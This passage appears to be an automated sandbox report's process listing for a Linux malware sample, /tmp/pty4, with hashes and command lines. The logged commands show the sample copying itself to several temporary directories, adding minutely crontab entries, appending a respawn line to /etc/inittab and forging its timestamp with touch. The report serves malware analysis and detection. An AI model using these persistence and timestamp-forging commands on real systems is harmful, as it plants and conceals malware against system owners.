File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/rm |
Arguments: | rm -rf /etc/inittab2 |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "touch -acmr /bin/ls /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/touch |
Arguments: | touch -acmr /bin/ls /etc/inittab |
File size: | 100728 bytes |
MD5 hash: | 3859c173f5d3b37be3e531b7c84a9c68 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cp -f /tmp/pty4 /dev/shm/pty4" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cp |
Arguments: | cp -f /tmp/pty4 /dev/shm/pty4 |
File size: | 153976 bytes |
MD5 hash: | 40f10ae7ea3e44218d1a8c306f79c83f |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "crontab -l | grep /dev/shm/pty4 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/pty4 > /dev/null 2>&1 &\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep /dev/shm/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v "no cron" |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab | grep -v \"/dev/shm/pty4\" > /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v /dev/shm/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "echo \"0:2345:respawn:/dev/shm/pty4\" >> /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab2 > /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab2 |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "rm -rf /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/rm |
Arguments: | rm -rf /etc/inittab2 |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "touch -acmr /bin/ls /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/touch |
Arguments: | touch -acmr /bin/ls /etc/inittab |
File size: | 100728 bytes |
MD5 hash: | 3859c173f5d3b37be3e531b7c84a9c68 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cp -f /tmp/pty4 /var/tmp/pty4" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cp |
Arguments: | cp -f /tmp/pty4 /var/tmp/pty4 |
File size: | 153976 bytes |
MD5 hash: | 40f10ae7ea3e44218d1a8c306f79c83f |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "crontab -l | grep /var/tmp/pty4 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/pty4 > /dev/null 2>&1 &\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep /var/tmp/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v "no cron" |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab | grep -v \"/var/tmp/pty4\" > /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v /var/tmp/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "echo \"0:2345:respawn:/var/tmp/pty4\" >> /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab2 > /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab2 |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "rm -rf /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/rm |
Arguments: | rm -rf /etc/inittab2 |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "touch -acmr /bin/ls /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/touch |
Arguments: | touch -acmr /bin/ls /etc/inittab |
File size: | 100728 bytes |
MD5 hash: | 3859c173f5d3b37be3e531b7c84a9c68 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cp -f /tmp/pty4 /var/lock/pty4" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cp |
Arguments: | cp -f /tmp/pty4 /var/lock/pty4 |
File size: | 153976 bytes |
MD5 hash: | 40f10ae7ea3e44218d1a8c306f79c83f |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "crontab -l | grep /var/lock/pty4 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/pty4 > /dev/null 2>&1 &\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep /var/lock/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v "no cron" |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab | grep -v \"/var/lock/pty4\" > /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v /var/lock/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:56 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:56 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "echo \"0:2345:respawn:/var/lock/pty4\" >> /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab2 > /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab2 |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "rm -rf /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/rm |
Arguments: | rm -rf /etc/inittab2 |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "touch -acmr /bin/ls /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/touch |
Arguments: | touch -acmr /bin/ls /etc/inittab |
File size: | 100728 bytes |
MD5 hash: | 3859c173f5d3b37be3e531b7c84a9c68 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cp -f /tmp/pty4 /var/run/pty4" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cp |
Arguments: | cp -f /tmp/pty4 /var/run/pty4 |
File size: | 153976 bytes |
MD5 hash: | 40f10ae7ea3e44218d1a8c306f79c83f |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "crontab -l | grep /var/run/pty4 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/pty4 > /dev/null 2>&1 &\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
